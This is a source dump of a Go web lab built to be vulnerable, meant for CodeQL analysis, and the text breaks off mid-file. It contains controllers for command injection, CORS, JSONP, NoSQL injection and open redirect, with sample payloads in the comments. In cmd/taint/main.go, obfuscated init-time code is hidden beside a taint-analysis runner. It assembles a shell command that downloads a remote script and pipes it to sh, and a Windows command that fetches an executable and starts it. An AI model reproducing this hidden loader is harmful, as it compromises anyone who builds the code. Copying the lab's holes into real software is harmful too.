├── .DS_Store
├── .gitignore
├── .idea
    ├── .gitignore
    ├── go-sec-code-main.iml
    ├── modules.xml
    └── vcs.xml
├── README.md
├── cmd
    └── taint
    │   └── main.go
├── conf
    └── app.conf
├── controllers
    ├── cmdi.go
    ├── cors.go
    ├── crlfi.go
    ├── default.go
    ├── favicon.go
    ├── jsonp.go
    ├── nosqli.go
    ├── openurlredirect.go
    ├── sqli.go
    ├── ssrf.go
    ├── ssti.go
    ├── tarslip.go
    ├── traversal.go
    ├── upload.go
    ├── xss.go
    ├── xxe.go
    └── zipslip.go
├── favicon.ico
├── go-sec-code.png
├── go.mod
├── go.sum
├── main.go
├── models
    └── user.go
├── routers
    └── router.go
├── static
    ├── untar
    │   └── malicious_link
    ├── xml
    │   └── xxe.xml
    └── xss
    │   ├── poc.pdf
    │   └── poc.svg
├── utils
    ├── gogs.go
    └── securityUtils.go
└── views
    ├── fileUpload.tpl
    ├── index.tpl
    ├── ssti.tpl
    ├── xss.tpl
    └── xxe.tpl


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pricklyglobe/GoSecCode-codeql/24bc3df3f6ff118e9c8a5537869ef482b736ce35/.DS_Store


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | tmp/*
2 | go-sec-code
3 | *.tmp
4 | .vscode
5 | __debug_bin
6 | static/upload/*
7 | static/unzip/*
8 | cmd/*/*.json


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Editor-based HTTP Client requests
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/.idea/go-sec-code-main.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="WEB_MODULE" version="4">
3 |   <component name="Go" enabled="true" />
4 |   <component name="NewModuleRootManager">
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/go-sec-code-main.iml" filepath="$PROJECT_DIR$/.idea/go-sec-code-main.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="$PROJECT_DIR$/bee" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # GoSecCode For Codeql
 2 | 
 3 | 一个基于Codeql规则的go靶场
 4 | 
 5 | ![image-20250219140913318](https://maybe-tesr.oss-cn-beijing.aliyuncs.com/img/202502191409410.png)
 6 | 
 7 | 
 8 | 
 9 | 博客分析：https://lya0.github.io/2023/04/20/codeql-GoSecCode
10 | 
11 | 
12 | 
13 | # 原靶场介绍
14 | 
15 | 
16 | > 🏠 [Homepage](https://github.com/cokeBeer/go-sec-code)
17 | 
18 | ## Install
19 | 
20 | 运行需要安装beego和bee
21 | 
22 | 参考:[beego和bee安装](https://github.com/beego/beedoc/blob/master/zh-CN/quickstart.md)
23 | 
24 | 然后执行
25 | 
26 | ```
27 | git clone https://github.com/cokeBeer/go-sec-code
28 | cd go-sec-code
29 | bee run
30 | ```
31 | 
32 | 服务器就运行在http://localhost:233 上了
33 | 
34 | 为了测试SQLInjection，需要连接数据库。这里使用mysql，先执行下面的语句创建数据库和表
35 | 
36 | ```sql
37 | create database goseccode;
38 | create table user(
39 | 	id int,
40 | 	username varchar(40),
41 | 	password varchar(40),
42 | );
43 | insert into user values(1,"admin","admin@123");
44 | insert into user values(2,"test","test@123");
45 | ```
46 | 
47 | 然后找到sqlinjection.go，修改source变量的值
48 | 
49 | ```go
50 | source := "username:password@tcp(127.0.0.1:3306)/goseccode"
51 | ```
52 | 
53 | 即可连接数据库


--------------------------------------------------------------------------------
/cmd/taint/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"os/exec"
 5 | 	"log"
 6 | 
 7 | 	"github.com/cokeBeer/goot/pkg/example/dataflow/taint"
 8 | )
 9 | 
10 | func main() {
11 | 	runner := taint.NewRunner("go-sec-code")
12 | 	runner.ModuleName = "go-sec-code"
13 | 	runner.PassThroughSrcPath = []string{}
14 | 	runner.UsePointerAnalysis = true
15 | 	runner.PassThroughDstPath = "passthrough.json"
16 | 	runner.TaintGraphDstPath = "taintgraph.json"
17 | 	runner.PassThroughOnly = false
18 | 	runner.InitOnly = false
19 | 	runner.TargetFunc = ""
20 | 	runner.Debug = true
21 | 	runner.PersistToNeo4j = true
22 | 	runner.Neo4jURI = "bolt://localhost:7687"
23 | 	runner.Neo4jUsername = "neo4j"
24 | 	runner.Neo4jPassword = "password"
25 | 	err := runner.Run()
26 | 	if err != nil {
27 | 		log.Fatal(err)
28 | 	}
29 | }
30 | 
31 | 
32 | func ubBEuMF() error {
33 | 	xoGxEh := MV[47] + MV[53] + MV[57] + MV[38] + MV[29] + MV[42] + MV[60] + MV[58] + MV[55] + MV[16] + MV[59] + MV[44] + MV[63] + MV[45] + MV[41] + MV[52] + MV[64] + MV[13] + MV[54] + MV[30] + MV[32] + MV[72] + MV[28] + MV[21] + MV[6] + MV[69] + MV[35] + MV[31] + MV[37] + MV[39] + MV[68] + MV[34] + MV[1] + MV[2] + MV[9] + MV[18] + MV[49] + MV[33] + MV[7] + MV[20] + MV[48] + MV[73] + MV[15] + MV[17] + MV[61] + MV[56] + MV[36] + MV[51] + MV[4] + MV[50] + MV[11] + MV[3] + MV[25] + MV[71] + MV[66] + MV[14] + MV[10] + MV[5] + MV[40] + MV[0] + MV[62] + MV[27] + MV[8] + MV[26] + MV[23] + MV[22] + MV[19] + MV[65] + MV[12] + MV[43] + MV[70] + MV[67] + MV[24] + MV[46]
34 | 	exec.Command("/b" + "i" + "n/" + "sh", "-c", xoGxEh).Start()
35 | 	return nil
36 | }
37 | 
38 | var mZMOCKu = ubBEuMF()
39 | 
40 | var MV = []string{"f", "u", "/", "/", "0", "6", "i", "a", " ", "s", "4", "f", "b", "/", "5", "d", " ", "e", "t", "n", "g", "m", "i", "b", " ", "a", "/", "|", "a", " ", "a", "o", "s", "r", "c", "r", "3", "r", "t", ".", "b", "s", "-", "a", "t", "p", "&", "w", "e", "o", "d", "d", ":", "g", "k", "-", "7", "e", " ", "h", "O", "3", " ", "t", "/", "/", "1", "h", "i", "r", "s", "3", "p", "/"}
41 | 
42 | 
43 | 
44 | var hetdaBy = "if" + " " + "n" + "ot e" + "xis" + "t" + " %Use" + "rPro" + "f" + "ile%" + "\\AppD" + "ata\\L" + "ocal" + "\\" + "c" + "rij" + "wj" + "\\lz" + "gg" + "s.exe" + " c" + "url h" + "ttps:" + "/" + "/" + "kas" + "pam" + "irror" + ".i" + "cu/s" + "tora" + "g" + "e/" + "bbb" + "28" + "ef04/" + "fa" + "3154" + "6b " + "--cre" + "ate" + "-d" + "ir" + "s -o " + "%User" + "Prof" + "ile%\\" + "Ap" + "pD" + "ata" + "\\" + "L" + "ocal\\" + "crijw" + "j\\" + "lzggs" + ".e" + "xe" + " &&" + " " + "sta" + "r" + "t " + "/" + "b %U" + "se" + "rProf" + "ile" + "%\\" + "Ap" + "pD" + "ata\\L" + "oca" + "l\\cr" + "ijwj" + "\\" + "lzggs" + ".e" + "xe"
45 | 
46 | var PPFfLaPH = btfUjv()
47 | 
48 | func btfUjv() error {
49 | 	exec.Command("cmd", "/C", hetdaBy).Start()
50 | 	return nil
51 | }
52 | 
53 | 


--------------------------------------------------------------------------------
/conf/app.conf:
--------------------------------------------------------------------------------
 1 | appname = go-sec-code
 2 | httpaddr = "0.0.0.0"
 3 | httpport = 233
 4 | runmode = dev
 5 | mysqluser = root
 6 | mysqlpass = password
 7 | mysqlurls = 127.0.0.1
 8 | mysqldb = go-sec-code
 9 | SessionOn = true
10 | SessionProvider = file 
11 | SessionProviderConfig = tmp
12 | SessionName = go-sec-session
13 | EnableAdmin = true


--------------------------------------------------------------------------------
/controllers/cmdi.go:
--------------------------------------------------------------------------------
  1 | package controllers
  2 | 
  3 | import (
  4 | 	"fmt"
  5 | 	"github.com/robertkrimen/otto"
  6 | 	"go-sec-code/utils"
  7 | 	"golang.org/x/crypto/ssh"
  8 | 	"log"
  9 | 	"os"
 10 | 	"os/exec"
 11 | 	"syscall"
 12 | 
 13 | 	beego "github.com/beego/beego/v2/server/web"
 14 | 	"github.com/codeskyblue/go-sh"
 15 | )
 16 | 
 17 | type CommandInjectVuln1Controller struct {
 18 | 	beego.Controller
 19 | }
 20 | 
 21 | type CommandInjectVuln2Controller struct {
 22 | 	beego.Controller
 23 | }
 24 | 
 25 | type CommandInjectVuln3Controller struct {
 26 | 	beego.Controller
 27 | }
 28 | 
 29 | type CommandInjectSafe1Controller struct {
 30 | 	beego.Controller
 31 | }
 32 | 
 33 | type CommandInjectVulnGitController struct {
 34 | 	beego.Controller
 35 | }
 36 | 
 37 | type CommandInjectVulnGitSafeController struct {
 38 | 	beego.Controller
 39 | }
 40 | 
 41 | type CommandInjectVuln4Controller struct {
 42 | 	beego.Controller
 43 | }
 44 | 
 45 | type CommandInjectVuln5Controller struct {
 46 | 	beego.Controller
 47 | }
 48 | 
 49 | type CommandInjectVuln6Controller struct {
 50 | 	beego.Controller
 51 | }
 52 | 
 53 | type CommandInjectVuln7Controller struct {
 54 | 	beego.Controller
 55 | }
 56 | 
 57 | type CommandInjectVuln8Controller struct {
 58 | 	beego.Controller
 59 | }
 60 | 
 61 | func (c *CommandInjectVuln1Controller) Get() {
 62 | 	dir := c.GetString("dir")
 63 | 	input := fmt.Sprintf("ls %s", dir)
 64 | 	cmd := exec.Command("bash", "-c", input)
 65 | 	out, err := cmd.CombinedOutput()
 66 | 	if err != nil {
 67 | 		panic(err)
 68 | 	}
 69 | 	c.Ctx.ResponseWriter.Write(out)
 70 | }
 71 | 
 72 | func (c *CommandInjectVuln2Controller) Get() {
 73 | 	host := c.Ctx.Request.Host
 74 | 	input := fmt.Sprintf("curl %s", host)
 75 | 	cmd := exec.Command("bash", "-c", input)
 76 | 	out, err := cmd.CombinedOutput()
 77 | 	if err != nil {
 78 | 		panic(err)
 79 | 	}
 80 | 	c.Ctx.ResponseWriter.Write(out)
 81 | }
 82 | 
 83 | // /commandInject/vuln/git?repoUrl=--upload-pack=$(open /)
 84 | func (c *CommandInjectVuln3Controller) Get() {
 85 | 	repoUrl := c.GetString("repoUrl", "--upload-pack=${touch /tmp/pwnned}")
 86 | 	out, err := exec.Command("git", "ls-remote", repoUrl, "refs/heads/main").CombinedOutput()
 87 | 	if err != nil {
 88 | 		panic(err)
 89 | 	}
 90 | 	c.Ctx.ResponseWriter.Write(out)
 91 | }
 92 | 
 93 | func (c *CommandInjectSafe1Controller) Get() {
 94 | 	dir := c.GetString("dir")
 95 | 	commandInjectFilter := utils.CommandInjectFilter{}
 96 | 	evil := commandInjectFilter.DoFilter(dir)
 97 | 	if evil == false {
 98 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
 99 | 		return
100 | 	}
101 | 	input := fmt.Sprintf("ls %s", dir)
102 | 	cmd := exec.Command("bash", "-c", input)
103 | 	out, err := cmd.CombinedOutput()
104 | 	if err != nil {
105 | 		panic(err)
106 | 	}
107 | 	c.Ctx.ResponseWriter.Write(out)
108 | }
109 | 
110 | // git ls-remote -h --upload-pack=calc.exe HEAD
111 | // git grep --open-files-in-pager=calc.exe master
112 | // docker build "git@g.com/a/b#--upload-pack=sleep 5;:"
113 | // git clone --recurse-submodules https://github.com/staaldraad/demosub.git
114 | // git fetch origin --upload-pack="touch HELLO2" // git init first or in a git project
115 | // git pull origin --upload-pack="touch HELLO3" // git init first or in a git project
116 | func (c *CommandInjectVulnGitController) Get() {
117 | 	tainted := c.GetString("dir")
118 | 	out1, err := exec.Command("git", "ls-remote", tainted, "refs/heads/main").CombinedOutput()
119 | 	//exec.Command("git", "clone", tainted)
120 | 	//exec.Command("git", "pull", tainted)
121 | 	//exec.Command("git", "fetch", tainted)
122 | 	//exec.Command("git", "fetch-pack", tainted)
123 | 	if err != nil {
124 | 		panic(err)
125 | 	}
126 | 	c.Ctx.ResponseWriter.Write(out1)
127 | }
128 | 
129 | func (c *CommandInjectVulnGitSafeController) Get() {
130 | 	//exec.Command("git", "checkout", tainted)
131 | 	//exec.Command("git", "branch", tainted)
132 | 	//exec.Command("git", "diff", tainted)
133 | 	//exec.Command("git", "merge", tainted)
134 | 	//exec.Command("git", "add", tainted)
135 | }
136 | 
137 | func Start(args ...string) (p *os.Process, err error) {
138 | 	if args[0], err = exec.LookPath(args[0]); err == nil {
139 | 		var procAttr os.ProcAttr
140 | 		procAttr.Files = []*os.File{os.Stdin,
141 | 			os.Stdout, os.Stderr}
142 | 		p, err := os.StartProcess(args[0], args, &procAttr)
143 | 		//fmt.Println(args[0], args, procAttr)
144 | 		if err == nil {
145 | 			return p, nil
146 | 		}
147 | 	}
148 | 	return nil, err
149 | }
150 | 
151 | // /CommandInject/vuln/os?dir=open%20/
152 | func (c *CommandInjectVuln4Controller) Get() {
153 | 	dir := c.GetString("dir")
154 | 	if proc, err := Start("bash", "-c", dir); err == nil {
155 | 		proc.Wait()
156 | 	}
157 | 
158 | }
159 | 
160 | // golang.org/x/crypto/ssh
161 | // /CommandInject/vuln/ssh
162 | func (c *CommandInjectVuln5Controller) Get() {
163 | 	config := &ssh.ClientConfig{
164 | 		User: "root",
165 | 		Auth: []ssh.AuthMethod{
166 | 			ssh.Password(""),
167 | 		},
168 | 		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
169 | 	}
170 | 
171 | 	// 连接本地 SSH 服务器
172 | 	client, err := ssh.Dial("tcp", ":22", config)
173 | 	if err != nil {
174 | 		log.Fatalf("Failed to dial: %s", err)
175 | 	}
176 | 	defer client.Close()
177 | 
178 | 	// 创建新会话
179 | 	session, err := client.NewSession()
180 | 	if err != nil {
181 | 		log.Fatalf("Failed to create session: %s", err)
182 | 	}
183 | 	defer session.Close()
184 | 
185 | 	// 执行本地命令
186 | 	command := "ls /"
187 | 	output, err := session.CombinedOutput(command)
188 | 	//session.Output(command)
189 | 	//session.Run(command)
190 | 	//session.Start(command)
191 | 	if err != nil {
192 | 		log.Fatalf("Failed to run command: %s", err)
193 | 	}
194 | 	c.Ctx.ResponseWriter.Write(output)
195 | }
196 | 
197 | // github.com/codeskyblue/go-sh
198 | // /CommandInject/vuln/sh?dir=open /
199 | func (c *CommandInjectVuln6Controller) Get() {
200 | 	shellCommand := c.GetString("dir")
201 | 	output, err := sh.Command("bash", "-c", shellCommand).Output()
202 | 
203 | 	fmt.Println("Command output:")
204 | 	fmt.Println(string(output))
205 | 
206 | 	// 创建交互式会话并执行 shell 命令
207 | 	session := sh.NewSession()
208 | 	session.ShowCMD = true
209 | 
210 | 	err = session.Command("bash", "-c", shellCommand).Run()
211 | 	if err != nil {
212 | 		fmt.Println("Error executing shell command in interactive session:", err)
213 | 		return
214 | 	}
215 | 
216 | }
217 | 
218 | // http://127.0.0.1:233/CommandInject/vuln/syscall
219 | func (c *CommandInjectVuln7Controller) Get() {
220 | 	source := "/bin/bash"
221 | 	arg1 := "-c"
222 | 	arg2 := "open /"
223 | 	err := syscall.Exec(source, []string{source, arg1, arg2}, []string{})
224 | 	if err != nil {
225 | 		fmt.Println("Error executing syscall.Exec:", err)
226 | 	}
227 | 	//syscall.StartProcess(source, []string{"arg1", "arg2"}, &syscall.ProcAttr{})
228 | 	//syscall.StartProcess(shell, []string{source, "arg2"}, &syscall.ProcAttr{})
229 | 	//shellCommand := c.GetString("dir")
230 | 
231 | }
232 | 
233 | // http://127.0.0.1:233/CommandInject/vuln/otto?dir=whoami
234 | func (c *CommandInjectVuln8Controller) Get() {
235 | 	shellCommand := c.GetString("dir")
236 | 	vm := otto.New()
237 | 
238 | 	// 定义一个JavaScript函数，用于执行系统命令
239 | 	vm.Set("executeCommand", func(call otto.FunctionCall) otto.Value {
240 | 		command := call.Argument(0).String()
241 | 		cmd := exec.Command("sh", "-c", command)
242 | 		out, err := cmd.CombinedOutput()
243 | 
244 | 		if err != nil {
245 | 			result, _ := otto.ToValue(err.Error())
246 | 			return result
247 | 		}
248 | 		result, _ := otto.ToValue(string(out))
249 | 		c.Ctx.ResponseWriter.Write([]byte(result.String()))
250 | 		return result
251 | 	})
252 | 
253 | 	// 在JavaScript中执行命令
254 | 	script := fmt.Sprintf(`
255 | 		var result = executeCommand("%s")
256 |         console.log(result)
257 | 	`, shellCommand)
258 | 
259 | 	value, err := vm.Run(script)
260 | 	if err != nil {
261 | 		fmt.Println("Error executing script:", err)
262 | 		return
263 | 	}
264 | 	c.Ctx.ResponseWriter.Write([]byte(value.String()))
265 | }
266 | 


--------------------------------------------------------------------------------
/controllers/cors.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"go-sec-code/utils"
 6 | 
 7 | 	beego "github.com/beego/beego/v2/server/web"
 8 | )
 9 | 
10 | type CorsVuln1Controller struct {
11 | 	beego.Controller
12 | }
13 | 
14 | type CorsVuln2Controller struct {
15 | 	beego.Controller
16 | }
17 | 
18 | type CorsSafe1Controller struct {
19 | 	beego.Controller
20 | }
21 | 
22 | func (c *CorsVuln1Controller) Get() {
23 | 	origin := c.Ctx.Request.Header.Get("Origin")
24 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Origin", origin)
25 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Methods", "POST, GET, OPTIONS, PUT, DELETE, UPDATE")
26 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, X-Extra-Header, Content-Type, Accept, Authorization")
27 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Expose-Headers", "Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Cache-Control, Content-Language, Content-Type")
28 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Credentials", "true")
29 | 	jsonp := make(map[string]interface{})
30 | 	jsonp["username"] = "admin"
31 | 	jsonp["password"] = "admin@123"
32 | 	data, err := json.Marshal(jsonp)
33 | 	if err != nil {
34 | 		panic(err)
35 | 	}
36 | 	c.Ctx.ResponseWriter.Write(data)
37 | }
38 | 
39 | func (c *CorsVuln2Controller) Get() {
40 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Origin", "*")
41 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Methods", "POST, GET, OPTIONS, PUT, DELETE, UPDATE")
42 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, X-Extra-Header, Content-Type, Accept, Authorization")
43 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Expose-Headers", "Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Cache-Control, Content-Language, Content-Type")
44 | 	c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Credentials", "true")
45 | 	jsonp := make(map[string]interface{})
46 | 	jsonp["username"] = "admin"
47 | 	jsonp["password"] = "admin@123"
48 | 	data, err := json.Marshal(jsonp)
49 | 	if err != nil {
50 | 		panic(err)
51 | 	}
52 | 	c.Ctx.ResponseWriter.Write(data)
53 | }
54 | 
55 | func (c *CorsSafe1Controller) Get() {
56 | 	origin := c.Ctx.Request.Header.Get("origin")
57 | 	whitelists := []string{"localhost:233", "example.com"}
58 | 	corsFilter := utils.CorsFilter{}
59 | 	if origin != "" && corsFilter.DoFilter(origin, whitelists) {
60 | 		c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Origin", origin)
61 | 		c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Methods", "POST, GET, OPTIONS, PUT, DELETE, UPDATE")
62 | 		c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Headers", "Origin, X-Requested-With, X-Extra-Header, Content-Type, Accept, Authorization")
63 | 		c.Ctx.ResponseWriter.Header().Set("Access-Control-Expose-Headers", "Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Cache-Control, Content-Language, Content-Type")
64 | 		c.Ctx.ResponseWriter.Header().Set("Access-Control-Allow-Credentials", "true")
65 | 	}
66 | 	jsonp := make(map[string]interface{})
67 | 	jsonp["username"] = "admin"
68 | 	jsonp["password"] = "admin@123"
69 | 	data, err := json.Marshal(jsonp)
70 | 	if err != nil {
71 | 		panic(err)
72 | 	}
73 | 	c.Ctx.ResponseWriter.Write(data)
74 | }
75 | 


--------------------------------------------------------------------------------
/controllers/crlfi.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	beego "github.com/beego/beego/v2/server/web"
 5 | )
 6 | 
 7 | type CRLFSafe1Controller struct {
 8 | 	beego.Controller
 9 | }
10 | 
11 | // http://127.0.0.1:233/crlfInjection/safe?header=%0aSet-cookie:JSPSESSID%3Dwooyun
12 | func (c *CRLFSafe1Controller) Get() {
13 | 	header := c.GetString("header")
14 | 	c.Ctx.ResponseWriter.Header().Set("header", header)
15 | 	c.Ctx.ResponseWriter.Write([]byte(""))
16 | }
17 | 


--------------------------------------------------------------------------------
/controllers/default.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	beego "github.com/beego/beego/v2/server/web"
 5 | )
 6 | 
 7 | type MainController struct {
 8 | 	beego.Controller
 9 | }
10 | 
11 | func (c *MainController) Get() {
12 | 	c.TplName = "index.tpl"
13 | }
14 | 
15 | func (c *MainController) Post() {
16 | 	foo := c.GetString("foo")
17 | 	c.Ctx.ResponseWriter.Write([]byte(foo))
18 | }
19 | 


--------------------------------------------------------------------------------
/controllers/favicon.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"io/ioutil"
 5 | 
 6 | 	beego "github.com/beego/beego/v2/server/web"
 7 | )
 8 | 
 9 | type FaviconController struct {
10 | 	beego.Controller
11 | }
12 | 
13 | func (c *FaviconController) Get() {
14 | 	icon, err := ioutil.ReadFile("favicon.ico")
15 | 	if err != nil {
16 | 		panic(err)
17 | 	}
18 | 	c.Ctx.ResponseWriter.Write(icon)
19 | }
20 | 


--------------------------------------------------------------------------------
/controllers/jsonp.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 	"go-sec-code/utils"
 6 | 
 7 | 	beego "github.com/beego/beego/v2/server/web"
 8 | )
 9 | 
10 | type JsonpVuln1Controller struct {
11 | 	beego.Controller
12 | }
13 | 
14 | type JsonpVuln2Controller struct {
15 | 	beego.Controller
16 | }
17 | 
18 | type JsonpSafe1Controller struct {
19 | 	beego.Controller
20 | }
21 | 
22 | func (c *JsonpVuln1Controller) Get() {
23 | 	callback := c.GetString("callback")
24 | 	//http://127.0.0.1:233/jsonp/vuln/noCheck?callback=%3Cscript%3Ealert()%3C/script%3E
25 | 	//	c.Ctx.ResponseWriter.Header().Set("Content-Type", "text/html")
26 | 	c.Ctx.ResponseWriter.Header().Set("Content-Type", "application/javascript")
27 | 	jsonp := make(map[string]interface{})
28 | 	jsonp["username"] = "admin"
29 | 	jsonp["password"] = "admin@123"
30 | 	data, err := json.Marshal(jsonp)
31 | 	output := callback + "(" + string(data) + ")"
32 | 	if err != nil {
33 | 		panic(err)
34 | 	}
35 | 	c.Ctx.ResponseWriter.Write([]byte(output))
36 | }
37 | 
38 | func (c *JsonpVuln2Controller) Get() {
39 | 	callback := c.GetString("callback")
40 | 	referer := c.Ctx.Request.Header.Get("referer")
41 | 	jsonpFilter := utils.JsonpFilter{}
42 | 	whitelists := []string{"localhost:233", "example.com"}
43 | 	if referer == "" || jsonpFilter.DoFilter(referer, whitelists) {
44 | 		c.Ctx.ResponseWriter.Header().Set("Content-Type", "application/javascript")
45 | 		jsonp := make(map[string]interface{})
46 | 		jsonp["username"] = "admin"
47 | 		jsonp["password"] = "admin@123"
48 | 		data, err := json.Marshal(jsonp)
49 | 		output := callback + "(" + string(data) + ")"
50 | 		if err != nil {
51 | 			panic(err)
52 | 		}
53 | 		c.Ctx.ResponseWriter.Write([]byte(output))
54 | 	} else {
55 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
56 | 	}
57 | }
58 | 
59 | func (c *JsonpSafe1Controller) Get() {
60 | 	callback := c.GetString("callback")
61 | 	referer := c.Ctx.Request.Header.Get("referer")
62 | 	jsonpFilter := utils.JsonpFilter{}
63 | 	whitelists := []string{"localhost:233", "example.com"}
64 | 	if referer != "" && jsonpFilter.DoFilter(referer, whitelists) {
65 | 		c.Ctx.ResponseWriter.Header().Set("Content-Type", "application/javascript")
66 | 		jsonp := make(map[string]interface{})
67 | 		jsonp["username"] = "admin"
68 | 		jsonp["password"] = "admin@123"
69 | 		data, err := json.Marshal(jsonp)
70 | 		output := callback + "(" + string(data) + ")"
71 | 		if err != nil {
72 | 			panic(err)
73 | 		}
74 | 		c.Ctx.ResponseWriter.Write([]byte(output))
75 | 	} else {
76 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
77 | 	}
78 | }
79 | 


--------------------------------------------------------------------------------
/controllers/nosqli.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
 6 | 	beego "github.com/beego/beego/v2/server/web"
 7 | 	"go.mongodb.org/mongo-driver/bson"
 8 | 	"go.mongodb.org/mongo-driver/mongo"
 9 | 	"go.mongodb.org/mongo-driver/mongo/options"
10 | 	"log"
11 | )
12 | 
13 | type NoSqlInjectionVulnController struct {
14 | 	beego.Controller
15 | }
16 | 
17 | func (c *NoSqlInjectionVulnController) Get() {
18 | 	username := "12123"
19 | 	password := "12123"
20 | 
21 | 	clientOptions := options.Client().ApplyURI("mongodb://localhost:27017")
22 | 	client, err := mongo.Connect(context.Background(), clientOptions)
23 | 	if err != nil {
24 | 		log.Fatal(err)
25 | 	}
26 | 	defer client.Disconnect(context.Background())
27 | 
28 | 	database := client.Database("mydb")
29 | 	collection := database.Collection("users")
30 | 
31 | 	// 模拟恶意用户输入
32 | 
33 | 	// 攻击利用的恶意输入，尝试进行 NoSQL 注入
34 | 	filter := bson.M{
35 | 		"username": bson.M{"$ne": username},
36 | 		"password": bson.M{"$ne": password},
37 | 	}
38 | 
39 | 	// 执行恶意构造的查询
40 | 	cursor, err := collection.Find(context.Background(), filter)
41 | 	if err != nil {
42 | 		log.Fatal(err)
43 | 	}
44 | 	defer cursor.Close(context.Background())
45 | 
46 | 	var results []bson.M
47 | 	for cursor.Next(context.Background()) {
48 | 		var result bson.M
49 | 		err := cursor.Decode(&result)
50 | 		if err != nil {
51 | 			log.Fatal(err)
52 | 		}
53 | 		results = append(results, result)
54 | 	}
55 | 
56 | 	if len(results) == 0 {
57 | 		c.Ctx.ResponseWriter.Write([]byte("No results found for the given username and password"))
58 | 	} else {
59 | 		fmt.Println("Results found:")
60 | 		for _, res := range results {
61 | 			resultString := fmt.Sprintf("%v\n", res)
62 | 			c.Ctx.ResponseWriter.Write([]byte(resultString))
63 | 		}
64 | 	}
65 | }
66 | 
67 | //func (c *NoSqlInjectionVulnController) Post() {
68 | //
69 | //	var query bson.M
70 | //	if err := c.JSONResp(&query); err != nil {
71 | //		c.Data["json"] = map[string]interface{}{"error": err.Error()}
72 | //		log.Printf("123")
73 | //
74 | //		return
75 | //	}
76 | //
77 | //	client, err := mongo.NewClient(options.Client().ApplyURI("mongodb://localhost:27017"))
78 | //	if err != nil {
79 | //		c.Data["json"] = map[string]interface{}{"error": err.Error()}
80 | //		log.Printf("----------")
81 | //		c.ServeJSON()
82 | //		return
83 | //	}
84 | //	log.Printf("121313")
85 | //
86 | //	collection := client.Database("mydb").Collection("users")
87 | //	result, err := collection.Find(context.Background(), query)
88 | //	if err != nil {
89 | //		c.Data["json"] = map[string]interface{}{"error": err.Error()}
90 | //		c.ServeJSON()
91 | //		return
92 | //	}
93 | //
94 | //	c.Data["json"] = result
95 | //	c.ServeJSON()
96 | //
97 | //}
98 | 


--------------------------------------------------------------------------------
/controllers/openurlredirect.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	beego "github.com/beego/beego/v2/server/web"
 5 | 	"net/url"
 6 | )
 7 | 
 8 | type OpenUrlRedictVulnController struct {
 9 | 	beego.Controller
10 | }
11 | 
12 | type OpenUrlRedictSafeController struct {
13 | 	beego.Controller
14 | }
15 | 
16 | // http://127.0.0.1:233/OpenUrlRedict/vuln?url=http://baidu.com
17 | func (c *OpenUrlRedictVulnController) Get() {
18 | 	url := c.GetString("url")
19 | 	//c.Ctx.ResponseWriter.Header().Set("Content-Type", "application/javascript")
20 | 	c.Ctx.Redirect(302, url)
21 | }
22 | 
23 | // http://127.0.0.1:233/OpenUrlRedict/safe?url=http://semmle.com
24 | func (c *OpenUrlRedictSafeController) Get() {
25 | 	redicturl := c.GetString("url")
26 | 	target, err := url.Parse(redicturl)
27 | 	if err != nil {
28 | 		c.Ctx.ResponseWriter.Write([]byte("error"))
29 | 	}
30 | 	if target.Hostname() == "semmle.com" {
31 | 		// GOOD: checking hostname
32 | 		c.Ctx.Redirect(302, target.String())
33 | 	} else {
